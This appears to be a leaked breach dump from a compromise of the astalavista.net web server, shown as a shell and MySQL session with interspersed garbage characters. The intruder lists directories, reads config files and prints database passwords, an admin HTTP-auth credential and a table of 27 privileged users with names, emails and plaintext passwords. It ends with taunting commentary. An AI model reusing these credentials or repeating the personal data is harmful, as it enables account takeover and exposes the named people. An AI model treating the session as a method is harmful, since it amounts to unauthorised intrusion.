total 48  J- r' [4 I$ [
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
  L" s0 t0 Z1 V/ V6 Qdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
& Z% |/ |% ?3 Z. \( A5 R" R! vdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
) j( V1 g& |$ m0 m* q-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
$ }# K; Y# ^( i& S: G% N5 O-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
% T' x2 [; K$ s" C4 f-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
8 a; Q# C$ s2 V: X6 a2 q$ a-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc- q. }6 k. h, H" ]9 s
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
: R" X! \0 m* ^# Q  y/ D( F0 }& Cdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
" m7 Q' q* ]/ ~* w9 Ydrwx——  2 astanet astanet 4096 Dec 23 12:18 mail- Z, i, [$ `8 b' Y
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html2 o6 l! f9 R9 a% {7 }/ L, [
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
  A) r4 R8 n! G8 a* b
) z  R. m( J: \6 D0 f2 j- v3 dsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
6 ?$ b% |1 d7 {) c' D8 S! u" Dsh-3.2$ ls -la: A- y2 P4 K" e, _+ k& J
total 2000 V  K( y# a, y; T! y
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .) J2 T: f- T+ Q- ^
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
+ i) B; {/ p/ T+ Rdrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _0077 v) C4 a- m: p9 U8 o! ~/ O
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql% h4 ~3 }* q( }' K
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
4 S4 \& y# d  {! `+ @8 tdrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend7 T! B9 R2 ]* T% n6 K, }' }
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
& k+ r% @  D2 J8 a$ X& P-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg! j$ E' D. b- r! I
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config: v9 s# Y* P' r, D* Q
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron$ ~. [8 `. h) Z. h9 }& o
drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd9 P: t$ @; }+ z) n6 F
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
% G4 w8 r. k: W: f/ W8 f9 f-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico. O5 T1 Z+ I! y9 s: Z6 Q$ c$ n
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed7 z2 q- C6 f! j  {1 a( S6 d  {, n
drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour) C: Q* ]: C5 n0 b" Y
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess* z" s6 O2 |% m" F7 u- g4 i7 p4 c
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess
8 `$ W1 F' f' b4 i-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php8 J# x+ e; m# {4 D& B4 J' y
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html4 N" u/ ^8 q) [. Q$ d6 q: x
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
/ `- ^. y% b$ Z) H1 K) v: ]5 C-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php
. L+ S! w# n* y& B& w-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
$ D& @9 i$ f+ ?0 N+ R* W/ x, pdrwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
, U7 L  d4 u3 f# Ddrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
. ?* `+ X8 n& f0 H! {drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
) T! l" C9 |; pdrwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log! q* s, L* ?- d" l( F2 h/ g2 x- E2 _
drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
7 U. d2 z: D  E; Bdrwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
! o1 S0 I% ^/ R! A0 y$ qdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new7 Y# p$ X: z2 ~3 K- N' r- [
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf
6 ~8 k" b. E/ K  U8 ^drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re; O- ~) }& l: X. I! G
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
4 Y% n0 d5 ~3 idrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss  O# c3 t* f( U7 p0 `" X& M
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
7 t5 B4 D) c9 W5 o  |1 ?drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com8 Q( |+ ?$ q8 J5 h, }
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes4 x, C3 y: F7 f
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
0 I" P* F% m- L* @drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
8 }4 N$ |2 \% edrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
5 g( K: A9 u0 e! J" Mdrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
, v; u9 H& m9 o, U9 E; l-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php  I: _" j5 V" }2 ^0 t9 r3 Z: M
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
, F/ F! _# k8 O4 S0 O
" f, A! {. M; ?1 jsh-3.2$ head -20 index.php
; l7 d7 a! z. H; t/ C<?PHP7 H2 V4 e: V; G+ {
/**
& T5 V7 P0 O: c% Z6 T* Mainfile (external) for astalavistaNET v2.0
  m  r" ~- ], @*- P+ S! {" e* s9 s1 E" T
* @copyright     Astalavista IT Engineering GmbH
6 F" S# E9 P6 g3 K7 g; r3 j) E* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>  l) w* H& K( g6 G% `- d
* @version       1.0" p; U9 \! @3 _
*/7 b# h' y5 X5 Q: x9 X

5 g% b4 X8 ]. h- k- u) Z        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {/ H5 p$ b$ ]9 e* C- p# ]
                $dontStartSession = false;
) F3 K$ \/ q/ d+ B! L. R- p        } else {% u5 i( m: H# a% m/ T* ?% d
                $dontStartSession = true;
$ U/ i: ^+ H8 \# m5 g% x        }/ @) M  Y- I: d( k8 T! i/ [' D. ]
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);5 Q  B' \1 q* O3 |# u4 H
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);+ P( e# Z( H) R8 [% C
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
, z/ F+ K+ e; q. f/ L        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);+ d. D, e0 N( |
( ]- ^! g; q9 F8 [# c* x, R
sh-3.2$ cd config2 Y! z+ P5 }2 Z6 ?1 _7 `0 A
sh-3.2$ ls -la
" ?  Q3 t% S# L9 d9 K# ototal 32, o. C$ k7 b3 Z+ |, d/ h3 r: z; b
drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
! h, C# |! J) g/ T) Udrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
/ `. h# n, z( F& O* ~7 K-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php
- P( @" T$ |  K( X-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php- g- ]( A9 a8 e) e: M. _# p8 w/ z7 }
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
* q) l6 M! n. }2 \-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
- x7 L0 O# P+ A" J6 I- m3 E-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
1 N. R/ r, H- I6 k
! G8 [" D2 s5 w! D4 y5 F, x" T1 qsh-3.2$ cat com.conf.php
+ P: Y% n4 U% D0 B9 q6 G& u/ v2 q[snip]  z' M+ H$ D. L" c7 l" M
//member-database/ w% s9 W6 X8 }: P
$_CONFIG['db_mem_server']       = ‘localhost’;7 i2 p2 D( [1 X* H- z
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;1 o  g& I9 E" a- R8 f
$_CONFIG['db_mem_user']         = ‘astanet_db’;
8 A5 l" u- c6 L$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
' O4 R; P! \# y/ p; V. g$ C7 Y) {3 ~$_CONFIG['db_mem_debug']        = false; //true or false
8 W; O- v1 b3 Z" \" B/ ^( H/ P3 A7 K//ads-database
9 }4 R  t; t+ E* k2 J3 t- ~$_CONFIG['db_ads_server']       = ‘localhost’;
6 }6 Y. j: ?4 ?, q$_CONFIG['db_ads_database'] = ‘astanet_ads’;9 |3 t5 |4 f- O! u
$_CONFIG['db_ads_user']         = ‘astanet_db’;
( f* K* [$ z/ y& |$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;. U% U* |& L% Z# W( G
$_CONFIG['db_ads_debug']        = false; //true or false
1 Z' `# p# ], V/ h: ?//rainbow-database
/ O% |. T1 r7 o0 D. |* _7 Q" I$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;* j8 u0 i; o' p5 r* }: v/ S* J- r4 `
$_CONFIG['db_rainbow_database'] = ‘rainbow’;; [* _% ~/ m4 W! v. ^8 e% q% h% p
$_CONFIG['db_rainbow_user']     = ‘dinu’;& A. l9 `- ~# v$ g7 u4 A2 x7 m
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
( H, w' p( J  W1 Y, m! I2 e$_CONFIG['db_rainbow_debug']    = false; //true or false
& F+ Q. S8 H' ~+ P! M: \  \; ^//mailing lists database# W1 D% p0 H- [  J& o" u
$_CONFIG['db_mailing_lists_server']     = ‘localhost’;( k+ m! j3 ]9 ^+ u7 E
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;" Q9 a. `7 l1 e5 {; r1 X
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;
* _3 J" x$ M" ~! b) E2 B4 n3 S$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;4 y. X1 G6 `4 k8 u( P5 A" J6 d$ C1 v
$_CONFIG['db_mailing_lists_debug']              = false; //true or false
( J$ n  t9 q7 J6 Y' G2 a3 l: ]//paypal
& Y- I( C& _4 N$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;% ?7 ^4 K5 |1 z0 a; Q! {6 f5 p
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;# P+ w6 m. l2 r* M6 h
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;1 D0 \7 ?" m. S' z
$_CONFIG['sub_pp_noship']       = ‘1′;/ Q. y" X0 {# d, _; ]1 ^8 c
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;: v+ D% B, p8 y: y8 [+ h
[snip]! u$ H& u& ?; l* L: `, C7 O3 o

7 H& O+ p6 V- ?sh-3.2$ cd ..3 H1 M7 y( c! k" ~; N
sh-3.2$ cd member
% [$ \( @$ q0 h3 K- @3 k+ ?! _7 Ksh-3.2$ ls -la
! T  `# Y. u9 \total 20
6 Y3 p- ?* m% r- a, \/ j5 Z0 jdrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .- O) c& |3 @# y! t* O- _
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
8 I/ ?% H2 ?% r1 d-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
  ]9 a! ]' o8 [4 U. p-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
  |- G( b# S9 Z# i0 y% }sh-3.2$ cat .htaccess
; v0 J4 y* G; q% u% d6 \SecFilterEngine off( H% }0 i! ?: p) M" s! d
; i  y, I" m& @
sh-3.2$ cd ..! [4 j( c! O9 l$ s  M  w
sh-3.2$ cd cron/ x4 W& o7 \+ U$ u, m3 _4 q
sh-3.2$ ls -la
0 Z& c$ W8 m. o% W1 l% Dtotal 1687 _" ?& |5 y4 N1 G9 s
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
/ x( r5 a0 x/ k" T2 \1 Cdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
  U( k" S" l6 D/ M6 d-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
6 [/ {9 k- r) V$ G1 K! I-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php  A5 f: @% f" ~# K7 F2 E' b' L
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
, q/ r  |+ u% ?% f5 D4 Z. L-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
! g  Y+ ~% t7 a1 n-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php* N. V& c* I: e0 a# m2 D
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php: l+ G5 F3 G" U1 E$ j: f2 _: R
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php7 H) ?3 w/ M' \! x
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php% B) ?- n9 P3 _
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh* c) N) R7 E$ F* }3 k6 W
-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php3 P6 `. N/ n' ]5 o' }
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
+ B6 y: d! P. f6 R9 I; f( p-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php! C/ }6 T' M) i- n! d! k( M' ]
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh8 w4 f0 _8 u) M: [1 f
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php" S/ y; s6 n9 G1 u4 ?
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php( k2 R5 _! r- x- a7 [! ^: @8 g. d9 y
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
" V4 u! f7 \+ n9 U! ^-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
8 j4 L) D9 f5 B5 p-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
0 Q% Q& L5 }+ C; hdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
# }4 n* P& p  `" [$ `-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php3 ?( s1 l. i+ h+ z, O( c. H# W( N
-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php6 f  m% p: c9 u) M
. H! u3 ^4 b0 }2 @5 y
sh-3.2$ cd ..
4 N% a8 S, _9 T1 \2 f, @sh-3.2$ cd _007& J+ N/ j) v2 i/ f( `" a
sh-3.2$ ls -la
  K- x% y3 M) W/ m6 t4 Ttotal 240 L! w2 `/ Y, M  m! b0 M
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
' n) B. l8 F& t' m4 A/ Q# ]drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
& t2 w' |/ I  t7 z5 e-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
- F5 f) H( D$ F8 O1 r8 }* b* @/ p( Y-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php% _( q4 l" k( C4 P* a# D
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php+ S6 B0 v0 w9 _, g! y
drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap1 @" ^8 h' A" d

' N) d0 D- h" `$ y9 y: ?sh-3.2$ cat  .htaccess& w0 O3 l7 i4 l* M$ ]/ f
authType Basic
7 Z$ x; r2 j" w; M& e$ w/ U) WauthName Admin" K5 \1 G$ m+ o7 |. E
authUserFile /home/astanet/auth/.htadm_pwd, ?& x4 M3 Z: L8 A
require valid-user
/ D* E9 N% J; T9 R3 i; Q& j' }5 U2 u, o; P0 J! |6 d
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
3 G! g; m; |) b/ a* wadmin2net:CR0bl65MwhfT
: s2 G; N  Y! Q9 h6 q+ M2 C9 l( B; N2 f
sh-3.2$ mysql -u astanet_db -p; i6 ?. k$ v8 g* F* U6 M! \& o( p4 J, H
Enter password:
; O% V6 s$ }# oWelcome to the MySQL monitor.  Commands end with ; or \g.0 V8 M% W, U) [4 n& t2 G6 h% F2 x
Your MySQL connection id is 275153% o4 `1 B( X) A1 k9 _7 _, v
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
, K; i6 m8 l0 g. j+ Q+ }$ J* _
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.0 E' c: }! V) @
; e: C0 e# w# e& t
mysql> show databases;6 `. d% R3 Z4 T
+———————–+
8 n2 A$ a$ m% R4 T( D; ]' b- i| Database              |* J( F! |2 J  f$ m$ X2 v' G) e
+———————–+4 z0 A; @) e% ?6 M# q; N
| information_schema    |
  C" E$ `* p8 X3 n* U| astanet_ads           |+ X/ f2 X2 J7 m2 R: X  H
| astanet_mailing_lists |! k, K& C. ]5 b( t
| astanet_mediawiki     |! k0 Z* E/ n9 E% O( f0 v: \7 g) @
| astanet_membersystem  |$ |& c4 p; |7 Z$ R& z! q5 j
| test                  |: H9 J7 V* U$ B3 [9 j
+———————–+5 k9 A2 C, U, X) t& q- Y
6 rows in set (0.00 sec)2 Y+ r1 `+ E" z9 p
- z7 ?* e  ?. z: r
mysql> use astanet_membersystem/ L: J. U5 M1 e8 M
Database changed
1 ~& X4 T7 f8 x3 h' I0 Amysql> show tables;  X% F7 K$ F  s: k5 M3 E, c' W
+———————————–+! X0 m* t! _6 P: ]1 ]5 ?
| Tables_in_astanet_membersystem    |
3 h& u4 M+ d  S+ z8 v, b; h+———————————–+" f1 U* K7 T8 a8 E" b: n& a. y
| blacklist_categories              |2 W3 q) S( }  D  d  f$ p/ \
| blacklist_content                 |
- e* w5 F* R% b' q  F| blacklist_levels                  |  t1 N. G3 \- f! ?7 S% \9 M
| blacklist_mcset                   |
, z6 n  a  d/ {) H  Y! s| dir_categories                    |
0 Z, V- ~+ G# t9 W| dir_comments                      |# D5 M3 v. ^% `) a. O" U
| dir_links                         |
4 k9 o3 S( o5 r) F9 ?' r| dir_temp                          |' j; _1 c  ^' _/ h. y
| dir_votes                         |
8 [9 @8 E! d6 q4 i8 Y5 {| documents                         |  [! i) U, V9 e# [- H7 A1 L# `! l
| documents_categories              |
/ V# K( f4 W3 i* v! ?+ x| email_content                     |
' J* j8 ^0 l2 R# T4 n7 F: A2 z| email_settings                    |
- y1 e% {* @8 j, `  F0 T; v| exploits                          |
7 b3 q) j9 _& ~! J| exploits_categories               |
, O* N- ^9 @" z' W' }% U| exploittree_categories            |0 L4 G6 f+ Q/ ~# C
| exploittree_exploits              |
$ P. H$ b0 t" u" v1 B2 F% R; E| home_values                       |3 d" u( H# U; M. N- D( H
| iso_countries                     |9 b: W) r1 _" r' v, I5 Y
| links_categories                  |3 x. e- B" y0 {. l* e4 K- t
| links_records                     |+ W5 B+ a3 |) E: n. {2 k9 X
| links_unauth                      |# ]2 Z3 J0 ]+ x1 O0 j7 |
| links_votes                       |
$ x$ H: L+ I. a1 Y1 a| log                               |9 i) d/ F% y  j7 R7 k, L
| news_categories                   |
1 X6 S8 `# L" }$ f$ ]; L| news_comments                     |
! P/ C9 @& z, \+ |6 a| news_emoticons                    |
, F1 o1 j# d) L/ A, K' P| news_latest                       |' C7 L" l+ o6 {
| news_messages                     |" v5 d6 n7 N# N; f1 e# h
| news_statistics                   |7 m# g/ ^8 X& O
| news_votes                        |
4 k# E- I. ]" f1 Q1 x0 P; x| prices_content                    |/ m; Z. M' A2 ?4 r5 l3 [% K( L4 K& K
| prices_offers                     |
& y1 E' q+ P2 v% I  @; f! J& o- D" Z| rss_settings                      |
) I: l8 B1 Y! J4 G. i  K% B+ K| sessions                          |1 Q+ x2 a! L/ g0 E! P4 ~1 L/ e9 y
| stats_signups                     |
. B* S; y8 A( s+ A4 ^. Z* O8 }| u2u2                              |
6 ]9 Q* L6 f: C: T3 e, ]% h| u2u_contact                       |
7 @. z/ R$ }9 N; B| u2u_settings                      |9 }, j" ^4 G8 W3 h% a+ a
| user_keywords_selected_categories |% H, `8 n/ Q5 U7 |# g# S+ C
| users                             |3 i) S; k1 d) \! M
| users_ipn_test                    |
+ K$ X$ R, Z1 B8 j4 b  n$ B' ?| users_keyword_values              |( P* _( A# e1 v" C" k  D
| users_profile                     |
7 p$ F' \& L$ V8 B$ k$ w| users_temp                        |
; m4 B/ d  u2 x| users_upgrade                     |
# {+ P3 q* z, M. k3 e7 |7 }+———————————–+# G' _! ^0 g9 z. |
46 rows in set (0.00 sec)
# E4 Z9 m5 Z4 l% m! o" F
+ f- O6 C- [% d+ W& }% Xmysql> describe users;
! s( ^3 }9 `" K7 [. ^4 c+————————–+————————————–+——+—–+———————+—————-+! |/ D) |7 I) _  B8 Z6 X
| Field                    | Type                                 | Null | Key | Default             | Extra          |
2 V8 Q& o, Y+ s2 n3 S+————————–+————————————–+——+—–+———————+—————-+' e( p* u2 G9 x
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
8 G3 S, I/ A  ~1 v$ D5 g| user                     | varchar(50)                          | NO   |     |                     |                |
9 o5 O' l# Y" H* N6 D' \| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
% {; j9 Z; @) E+ \2 h1 I  T| password                 | varchar(30)                          | NO   |     |                     |                |
  Q6 k, {& U1 R- d6 |7 U0 s$ N: q| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |7 b  ~; Z  P* p- q7 \5 y9 M! ~
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
' @) ^& c+ h: s, g# F/ v* u| email                    | varchar(50)                          | NO   |     |                     |                |0 p1 u# X: m- K9 ]5 `
| ip                       | varchar(15)                          | NO   |     | 0                   |                |* h+ B( v+ x1 ~5 x
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |( t3 ~2 F9 T" o8 b$ j6 @
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
8 I* O0 Q2 d1 ~+ K. D4 t" @  I| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
' k$ G+ W( N8 B| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
# a2 \. d7 f' Z| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |1 i9 k: E0 Y' x9 p% F* d( t
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |9 j6 R+ m' a) D2 W% Y8 H! v) J+ _
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
/ a" z5 [6 s3 z$ ?  a" k| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |0 T, z+ P; E$ [/ [  H0 y* w
| lang                     | tinytext                             | NO   |     |                     |                |5 A( ?3 m8 b9 m/ v8 b
| adid                     | smallint(6)                          | NO   |     | 0                   |                |7 O5 P# n7 r' f, ]( Q" Y# r5 g
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
6 V: q$ K; N, \/ L# x| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |( ?$ }7 M8 M1 P/ Y  g
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |4 L. m) ]1 O1 ^+ h5 C
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |, ^$ s' x# {  \5 y/ O% O6 `6 d
+————————–+————————————–+——+—–+———————+—————-+
1 ~4 |! m4 ]5 x0 _+ W22 rows in set (0.01 sec)+ d' v3 O( z# r1 O

3 N& u: V; s9 S7 Q* b2 Jmysql> select count(*) as skids from users;+ G. ~2 B# k3 |7 Q( d5 U
+——-+
4 H' a; N/ i6 A2 P| skids |7 Z: Y( X1 K" Q; p, U9 J/ B
+——-+5 o- A0 v5 v. p  M$ P1 R
| 25199 |
; y  t9 Y% u5 a0 S: C# q+——-+( U0 F. |2 @$ b4 \( ]$ h# b
1 row in set (0.00 sec)( I- Z; I) s$ ~* b, M5 N

" B! G& ?- `/ @mysql> select user,nickname,password,email from users where userlevel = 1;
0 M' v) h/ T* r) y+————————–+———————-+——————+———————————–+
9 r& Y  q' W0 \4 T2 a% ^& e| user                     | nickname             | password         | email                             |3 a: h. G/ a+ J6 F2 U
+————————–+———————-+——————+———————————–+
; N. u2 h3 J" P0 u: u4 w| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
) G3 k$ c* d8 M/ y" L( R| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |1 B! ?' t0 Y4 L
| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
( S& X! ]* C( n  I| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |; e( s3 g/ C/ W3 Y: S5 G( C
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |3 `2 @* Y" `2 c5 x, ?6 ]7 t& e
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |' M$ A/ ^! l' ?' z4 o; Z
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
1 w3 Z! |( h. @| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
5 z9 a. T! b! a( A4 H! }| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |8 _) u/ i7 g( m
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
% z; J$ w, _1 n, a' i| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |0 u6 x* Y1 x4 i* _3 X, ?* N
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |, j. ~7 e# U. n& ~3 B8 a
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
: w/ m7 l; t0 G8 H) a8 s| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |2 n7 l5 u" [4 e
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
! U/ s* P8 ~8 @4 f| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
; W' T  V- f6 N& e; S" k, H| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
& }$ s* }' O# ~4 W, B| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |8 j" E! A" F9 j# V% E: ]. n; ^
| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |( W1 ?; W6 R( O- b
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |6 V, ]$ Z* C+ x- g
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |9 q* J& B; \, i1 X* ^
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |/ ^% N7 C+ g7 L( ]' M$ b+ C. X
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |- P/ {9 S( @- @2 T
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
$ b( W* `! s2 }$ h" L! l| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |& u2 \6 ?. h* t! K  i
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |5 q* a/ q; f% N$ D' x
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
, e/ b/ N, p7 C$ A7 k+————————–+———————-+——————+———————————–+. y  \2 H0 L" H4 q9 |
27 rows in set (0.00 sec)5 _  k, X7 ^: H# G5 }
* I- Y. x2 `  a3 w$ B3 I
mysql> exit;$ g. }( A4 ^8 H7 t3 i
Bye
& K4 K9 c' y$ b+ H) j4 G( d6 X- R( V
[~] plaintext passwords? yes,
" f9 N  q# E) V* jThose so called “security professionals” who charge you $6.66 / month to
& p9 y; c' k0 B" I( A: @register at their hack-proof portal, save your passwords in plaintext…
/ a" t( J( l% o( w- pbrilliant!
- P2 f6 u+ d& _) {0 N( m; P* \- s$ \
! Z! |: J! u) _, R" N0 r[~] This been fun but we want more.  K: A" A9 k. T: l0 N6 C
